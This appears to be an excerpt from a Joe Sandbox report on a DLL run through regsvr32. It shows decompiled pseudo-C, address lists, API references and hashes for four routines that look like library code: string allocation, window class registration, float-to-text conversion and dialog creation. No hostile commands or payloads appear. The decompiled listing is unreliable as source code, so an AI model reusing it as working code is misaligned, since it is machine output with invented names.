Instruction Fuzzy Hash: 1931903680121ABBDB02DFA4ED89DFF7FB9EF09351F400119F901A2151D7359A11DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10029C82 Relevance: 15.2, APIs: 10, Instructions: 181
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10029C82(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x10036148(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10012400(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100231B4(_t103, 0x1002de8c) == 0) {
					_t109 = _t103;
					_t57 = E100231B4(_t103, 0x1002d4b0);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E10023367();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E10027747() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E100116D0(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E10008BC0(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E10027747() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E100116D0(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E10008BC0(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E10011A49(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E100116D0(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E10008BC0(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E10023367();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E100116D0(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E10008BC0(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E100116D0(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E10008BC0(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}

0x10029c83
0x10029c90
0x10029c98
0x10029c9e
0x10029ca4
0x10029caf
0x10029cb2
0x10029cb7
0x10029cbd
0x10029cc8
0x10029cca
0x10029cda
0x10029d88
0x10029d8a
0x10029d91
0x10029d99
0x10029d9a
0x10029dad
0x10029db2
0x10029db7
0x10029dbc
0x10029dbc
0x10029dc1
0x10029dee
0x10029def
0x10029df9
0x10029dfc
0x10029e03
0x10029e08
0x10029e13
0x10029e1d
0x10029e2a
0x10029e2f
0x10029e0a
0x10029e0a
0x10029e0a
0x10029e36
0x10029e3c
0x10029e3c
0x10029e43
0x10029e53
0x10029e58
0x10029e63
0x10029e6d
0x10029e7a
0x10029e5a
0x10029e5a
0x10029e5a
0x10029e80
0x10029e86
0x10029e86
0x10029ea4
0x10029ea4
0x10029dc3
0x10029dca
0x10029dd4
0x10029de3
0x10029de8
0x00000000
0x10029de8
0x10029d9c
0x10029da1
0x10029da6
0x00000000
0x10029da6
0x10029ce3
0x10029cea
0x10029cf0
0x10029cf6
0x10029cf9
0x10029d00
0x10029d06
0x10029d0a
0x10029d11
0x10029d1b
0x10029d2d
0x10029d32
0x10029d32
0x10029d39
0x10029d3f
0x10029d3f
0x10029d42
0x10029d45
0x10029d4a
0x10029d4e
0x10029d55
0x10029d5f
0x10029d6c
0x10029d71
0x10029d71
0x10029d78
0x10029d7e
0x10029d7e
0x00000000

APIs

lstrlenA.KERNEL32(?,1002DE8C), ref: 10029D0D

Part of subcall function 10008BC0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 10008BE2

SysAllocString.OLEAUT32(?), ref: 10029D39
lstrlenA.KERNEL32(?,1002DE8C), ref: 10029D51
SysAllocString.OLEAUT32(00000000), ref: 10029D78
lstrlenA.KERNEL32(?,0000F108,?,00000100,1002D4B0,1002DE8C), ref: 10029DC6
SysAllocString.OLEAUT32(00000000), ref: 10029DEF
lstrlenA.KERNEL32(?), ref: 10029E0F
SysAllocString.OLEAUT32(00000000), ref: 10029E36
lstrlenA.KERNEL32(?), ref: 10029E5F
SysAllocString.OLEAUT32(00000000), ref: 10029E80

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocStringlstrlen$ByteCharMultiWide
String ID:
API String ID: 2903237683-0
Opcode ID: de0bc46a09759d7d8f8fb8757648b13e3c5e195ba7c08ba692528cbbc1d75815
Instruction ID: c648e2966158b214d9de0f6ce91c9bd8f183a0581763daa94d68119b085db595
Opcode Fuzzy Hash: de0bc46a09759d7d8f8fb8757648b13e3c5e195ba7c08ba692528cbbc1d75815
Instruction Fuzzy Hash: 7451B376900609EBDB20EFB5DC85B8AB7B8FF04394F518526E914CB241DB74E951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001F70B Relevance: 15.1, APIs: 10, Instructions: 81
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F70B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011A8C(E1002A8B4, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E10027747() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E100286A3(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E10027747() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								_t19 = lstrlenA(_t63->lpszClassName) + 2; // 0x6
								if( *(_t71 + 8) + _t19 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10028706(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}

0x1001f710
0x1001f71b
0x1001f71e
0x1001f733
0x1001f747
0x1001f790
0x1001f790
0x1001f749
0x1001f74c
0x1001f758
0x1001f7e8
0x1001f7e8
0x1001f75e
0x1001f75f
0x1001f764
0x1001f773
0x1001f777
0x1001f77a
0x1001f783
0x1001f78e
0x1001f79c
0x1001f7a4
0x1001f7aa
0x1001f7d0
0x1001f7d7
0x1001f7ac
0x1001f7b8
0x1001f7c1
0x1001f7c5
0x1001f7c9
0x1001f7c9
0x1001f7dd
0x1001f7e3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001f78e
0x1001f758
0x1001f735
0x1001f737
0x1001f737
0x1001f7f0
0x1001f7f9

APIs

__EH_prolog.LIBCMT ref: 1001F710
GetClassInfoA.USER32 ref: 1001F72B
RegisterClassA.USER32 ref: 1001F73E
lstrlenA.KERNEL32(-00000034,00000001), ref: 1001F77A
lstrlenA.KERNEL32(?), ref: 1001F781

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Classlstrlen$H_prologInfoRegister
String ID:
API String ID: 3690589370-0
Opcode ID: 46f7db560ba77d1aac1329791f988d3da41fd5ea00b2b9b1c15773706d036c42
Instruction ID: eb128248469e04ddba19681c4089172a10975becbb5dbf1d992d7842769f5dc7
Opcode Fuzzy Hash: 46f7db560ba77d1aac1329791f988d3da41fd5ea00b2b9b1c15773706d036c42
Instruction Fuzzy Hash: 4831CE3590821AAFDB01DFA0CD85AAEBFF4FF04354F10401AE805A65A1C770EA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001BFCE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001BFCE(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C71C(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C4EA(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001BA61( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001BA8F( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001BA61( &_v20);
									E1001BA61( &_v20);
									E1001BA03(__eflags,  &_v20,  &_v44);
									E1001BA61( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10018100();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10018100();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E10011A49(_t105, _v8);
			}

0x1001bfd4
0x1001bfd9
0x1001bfdc
0x1001bfe0
0x1001bfeb
0x1001bff7
0x1001bffb
0x1001bfff
0x1001c003
0x1001c007
0x1001c00b
0x1001c00f
0x1001c013
0x1001c017
0x1001c01b
0x1001c01f
0x1001c023
0x1001c027
0x1001c02e
0x1001c030
0x1001c038
0x1001c032
0x1001c032
0x1001c032
0x1001c03f
0x1001c042
0x1001c054
0x1001c0ce
0x1001c0d9
0x1001c0f6
0x1001c0f9
0x1001c108
0x1001c10c
0x1001c10f
0x1001c114
0x1001c117
0x1001c11d
0x1001c127
0x1001c127
0x1001c128
0x1001c12e
0x1001c12f
0x1001c133
0x1001c136
0x1001c139
0x1001c14d
0x1001c14d
0x1001c150
0x1001c154
0x1001c154
0x1001c159
0x1001c15f
0x1001c15f
0x1001c15f
0x1001c164
0x1001c16b
0x1001c16f
0x1001c174
0x1001c174
0x1001c174
0x1001c177
0x1001c17a
0x1001c17c
0x1001c180
0x1001c180
0x1001c186
0x1001c188
0x1001c18c
0x1001c191
0x1001c191
0x1001c192
0x1001c188
0x1001c186
0x1001c195
0x1001c195
0x1001c198
0x1001c19a
0x1001c19d
0x1001c1a0
0x1001c1a2
0x1001c1a5
0x1001c1ab
0x1001c1ac
0x1001c1b1
0x1001c1b2
0x1001c1bb
0x1001c1c8
0x1001c1d1
0x1001c1de
0x1001c1e1
0x1001c1e4
0x1001c1e4
0x1001c1e4
0x1001c1e7
0x1001c1e9
0x1001c1e9
0x1001c1ef
0x1001c1ef
0x1001c1f2
0x1001c1f5
0x1001c1f6
0x1001c1f9
0x1001c1fc
0x1001c23c
0x1001c23c
0x1001c23e
0x00000000
0x00000000
0x1001c236
0x1001c239
0x1001c23b
0x1001c23b
0x00000000
0x1001c23b
0x00000000
0x1001c239
0x1001c240
0x1001c242
0x00000000
0x1001c244
0x1001c244
0x00000000
0x1001c244
0x1001c1fe
0x1001c209
0x1001c209
0x1001c20b
0x00000000
0x00000000
0x1001c200
0x1001c203
0x1001c205
0x1001c208
0x1001c208
0x00000000
0x1001c208
0x00000000
0x1001c203
0x1001c20d
0x1001c20f
0x1001c211
0x1001c212
0x1001c212
0x1001c212
0x1001c215
0x1001c215
0x1001c217
0x1001c219
0x1001c219
0x1001c21b
0x1001c221
0x00000000
0x1001c221
0x1001c13b
0x1001c13e
0x1001c140
0x1001c142
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c142
0x1001c056
0x1001c05d
0x1001c062
0x1001c070
0x00000000
0x1001c072
0x1001c072
0x00000000
0x1001c072
0x1001c079
0x1001c079
0x1001c079
0x1001c07c
0x1001c093
0x1001c093
0x1001c095
0x00000000
0x1001c097
0x1001c097
0x1001c09b
0x00000000
0x1001c09d
0x1001c09d
0x00000000
0x1001c09d
0x1001c09b
0x1001c07e
0x1001c07e
0x1001c084
0x00000000
0x1001c086
0x1001c086
0x1001c08a
0x1001c0ba
0x1001c0ba
0x1001c0bf
0x1001c0c2
0x1001c0c3
0x1001c0c8
0x1001c08c
0x1001c08c
0x1001c0a2
0x1001c0a5
0x1001c0a6
0x1001c0ab
0x1001c0ab
0x1001c08a
0x1001c084
0x1001c07c
0x1001c0af
0x1001c226
0x1001c226
0x1001c226
0x1001c144
0x1001c144
0x1001c144
0x1001c247
0x1001c247
0x1001c24d
0x1001c251
0x1001c255
0x1001c259
0x1001c259
0x1001c235

APIs

_strcat.LIBCMT ref: 1001C0A6
_strcat.LIBCMT ref: 1001C0C3
___shr_12.LIBCMT ref: 1001C18C

Strings

1#QNAN, xrefs: 1001C0BA
1#INF, xrefs: 1001C09D
?, xrefs: 1001C023
1#IND, xrefs: 1001C08C
1#SNAN, xrefs: 1001C072

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strcat$___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 1152255961-4131533671
Opcode ID: 3deeed232556c0083d1f5ccfdc9c101b2c61cfa05ef8230ec948a198c5436684
Instruction ID: 46e37a2c643aaa745d1bc51bced561f55ee0e999ab544f85a5308abf98787be4
Opcode Fuzzy Hash: 3deeed232556c0083d1f5ccfdc9c101b2c61cfa05ef8230ec948a198c5436684
Instruction Fuzzy Hash: CC81F4328042DEDEDF12CBA8C845BAE7BF4EF16354F0945AAE850DF182D374D6858762

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0AE Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1001F0AE(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011A8C(E1002A804, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E10027747() + 0xc);
				}
				_t135 =  *(E10027747() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E100206E5(_t109, 0x10);
				E100206E5(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E1002320B();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024117(__eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1003a0e4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E10021D7F();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB48, 0);
							E10002EB0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10020B34();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E100240E8(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E1002404A(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10023DFE(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10023DF0(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10012518( *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}

0x1001f0ae
0x1001f0b3
0x1001f0c3
0x1001f0c5
0x1001f0c8
0x1001f0cb
0x1001f0d5
0x1001f0d5
0x1001f0dd
0x1001f0e5
0x1001f0e8
0x1001f0eb
0x1001f0ee
0x1001f0f1
0x1001f0fb
0x1001f102
0x1001f12f
0x1001f132
0x1001f132
0x1001f134
0x1001f116
0x1001f116
0x1001f2aa
0x1001f2af
0x1001f2b8
0x1001f2b8
0x1001f136
0x1001f13b
0x1001f145
0x1001f151
0x1001f155
0x1001f162
0x1001f167
0x1001f16d
0x1001f16f
0x1001f1a7
0x1001f1a7
0x1001f1a9
0x1001f1ea
0x1001f1ea
0x1001f1ee
0x1001f1f2
0x1001f1f3
0x1001f1f8
0x1001f1fb
0x1001f1fd
0x1001f203
0x1001f1ff
0x1001f1ff
0x1001f1ff
0x1001f21d
0x1001f21f
0x1001f243
0x1001f246
0x1001f24a
0x1001f24c
0x1001f254
0x1001f257
0x1001f259
0x1001f260
0x1001f260
0x1001f259
0x1001f266
0x1001f26b
0x1001f26d
0x1001f273
0x1001f273
0x1001f279
0x1001f27b
0x1001f27d
0x1001f281
0x1001f284
0x1001f28a
0x1001f28a
0x1001f28a
0x1001f281
0x1001f28c
0x1001f28f
0x1001f294
0x1001f29d
0x1001f29d
0x1001f2a5
0x1001f2a7
0x1001f2a7
0x1001f2a7
0x00000000
0x1001f2a7
0x1001f1ab
0x1001f1af
0x1001f1ba
0x1001f1be
0x1001f1ce
0x1001f1d1
0x1001f1d5
0x1001f1da
0x1001f1dd
0x1001f1e8
0x1001f1e8
0x00000000
0x1001f1dd
0x1001f171
0x1001f173
0x00000000
0x00000000
0x1001f177
0x1001f17d
0x1001f17f
0x00000000
